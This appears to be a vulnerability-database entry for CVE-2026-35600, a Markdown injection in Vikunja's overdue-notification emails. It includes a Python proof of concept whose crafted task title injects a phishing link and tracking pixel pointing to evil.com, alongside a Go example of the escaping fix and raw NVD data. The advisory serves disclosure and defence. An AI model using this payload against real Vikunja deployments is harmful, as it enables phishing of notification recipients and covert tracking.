Security Vulnerability Report
CVE-2026-35600 CVSS 5.4 MEDIUM

CVE-2026-35600

Published: 2026-04-10 17:17:04
Last Modified: 2026-04-17 21:56:40

Description

Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, task titles are embedded directly into Markdown link syntax in overdue email notifications without escaping Markdown special characters. When rendered by goldmark and sanitized by bluemonday (which allows <a> and <img> tags), injected Markdown constructs produce phishing links and tracking pixels in legitimate notification emails. This vulnerability is fixed in 2.3.0.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:* - VULNERABLE
Vikunja < 2.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC concept for CVE-2026-35600
# Target: Vikunja < 2.3.0
#
# 1. An authenticated attacker creates a task with a malicious title.
#    The overdue-notification template (assumed here) drops the raw title
#    into a Markdown link: [$title](task_url).
#
# 2. To get a *visible* phishing link, the title must supply its own link
#    text and then close the link with "](...)" before the template does.
#    An image reference "![](...)" becomes a tracking pixel, because
#    bluemonday keeps <img>. Putting "](" first, as in
#    "](https://evil.com/phishing)[Click Here", would only yield an empty
#    anchor with no visible text.
TASK_URL = "https://vikunja.example.com/tasks/1"
malicious_title = (
    "Click here for your reward](https://evil.com/phishing) "
    "![](https://evil.com/pixel.gif)[x"
)

# 3. The Markdown source of the overdue email then becomes:
#    [Click here for your reward](https://evil.com/phishing) ![](https://evil.com/pixel.gif)[x](https://vikunja.example.com/tasks/1)
markdown_source = f"[{malicious_title}]({TASK_URL})"

# 4. goldmark parses this as:
#    - a link with text "Click here for your reward" pointing to https://evil.com/phishing
#    - an image (tracking pixel) loaded from https://evil.com/pixel.gif
#    - a link with text "x" pointing to the real task
#    bluemonday allows <a> and <img>, so all three survive sanitisation and
#    the victim sees a phishing link inside a legitimate notification email.
print(markdown_source)
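The description above states that the title lands unescaped inside Markdown link syntax and that bluemonday keeps <a> and <img>. The following Go program is an added example, not Vikunja's code and not the change made in the fix commit: it reproduces the vulnerable interpolation next to a hardened version that backslash-escapes Markdown punctuation before interpolation. The `[title](task_url)` template shape, the function names and the task URL are assumptions. The `linkTargets` check is a small regular expression that only approximates how goldmark recognises inline links and images; it is used so the effect can be verified offline without pulling in goldmark or bluemonday.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Assumed shape of the overdue-notification line: the title is dropped
// straight into Markdown link syntax. This reproduces the vulnerable
// pattern; it is not Vikunja's own template code.
func buildOverdueLineUnsafe(title, taskURL string) string {
	return fmt.Sprintf("[%s](%s)", title, taskURL)
}

// CommonMark lets any ASCII punctuation be backslash-escaped, so escaping
// the characters that can open or close links, images, emphasis and raw
// HTML is enough to make user-controlled text render literally.
const markdownPunct = "\\`*_{}[]()#+-.!<>|~"

// escapeMarkdown backslash-escapes Markdown punctuation in user text.
func escapeMarkdown(s string) string {
	var b strings.Builder
	for _, r := range s {
		if r < 128 && strings.ContainsRune(markdownPunct, r) {
			b.WriteByte('\\')
		}
		b.WriteRune(r)
	}
	return b.String()
}

// buildOverdueLineSafe is the hardened variant: the title is escaped before
// it is interpolated, so it can no longer terminate the link early.
func buildOverdueLineSafe(title, taskURL string) string {
	return fmt.Sprintf("[%s](%s)", escapeMarkdown(title), taskURL)
}

// linkTargets is a deliberately small check, not a Markdown parser: it lists
// the destination of every inline link or image ("[text](dest)" or
// "![alt](dest)") whose brackets are not backslash-escaped. Any destination
// other than the task URL means the title broke out of the template's link.
var inlineLinkRe = regexp.MustCompile(`!?\[((?:\\.|[^\]\\])*)\]\(([^)\s]+)\)`)

func linkTargets(markdown string) []string {
	var targets []string
	for _, m := range inlineLinkRe.FindAllStringSubmatch(markdown, -1) {
		targets = append(targets, m[2])
	}
	return targets
}

func main() {
	// Constructed sample input: a task title carrying the CVE-2026-35600
	// style payload (visible link text, early "](", tracking pixel).
	title := "Click here for your reward](https://evil.com/phishing) ![](https://evil.com/pixel.gif)[x"
	taskURL := "https://vikunja.example.com/tasks/1"

	unsafeLine := buildOverdueLineUnsafe(title, taskURL)
	safeLine := buildOverdueLineSafe(title, taskURL)
	fmt.Println("unsafe:", unsafeLine)
	fmt.Println("  targets:", linkTargets(unsafeLine))
	fmt.Println("safe:  ", safeLine)
	fmt.Println("  targets:", linkTargets(safeLine))
}
```

Running it shows the unescaped line producing three destinations (the phishing URL, the pixel, the task) while the escaped line yields only the task URL. Escaping on output is the minimal fix; an alternative with the same effect is to keep user text out of Markdown syntax entirely and render the title as plain text next to a fixed link.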

References

https://github.com/go-vikunja/vikunja/commit/0f3730d045f20e261e3cdfc6d93c325653395b64 (Patch)
https://github.com/go-vikunja/vikunja/pull/2580 (Issue Tracking)
https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0 (Release Notes)
https://github.com/go-vikunja/vikunja/security/advisories/GHSA-45q4-x4r9-8fqj (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35600", "sourceIdentifier": "[email protected]", "published": "2026-04-10T17:17:03.680", "lastModified": "2026-04-17T21:56:40.090", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, task titles are embedded directly into Markdown link syntax in overdue email notifications without escaping Markdown special characters. When rendered by goldmark and sanitized by bluemonday (which allows <a> and <img> tags), injected Markdown constructs produce phishing links and tracking pixels in legitimate notification emails. This vulnerability is fixed in 2.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.0", "matchCriteriaId": "CC8B46CF-6E7B-46F4-8275-D1A38F2A6D5E"}]}]}], "references": [{"url": "https://github.com/go-vikunja/vikunja/commit/0f3730d045f20e261e3cdfc6d93c325653395b64", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/go-vikunja/vikunja/pull/2580", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-45q4-x4r9-8fqj", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}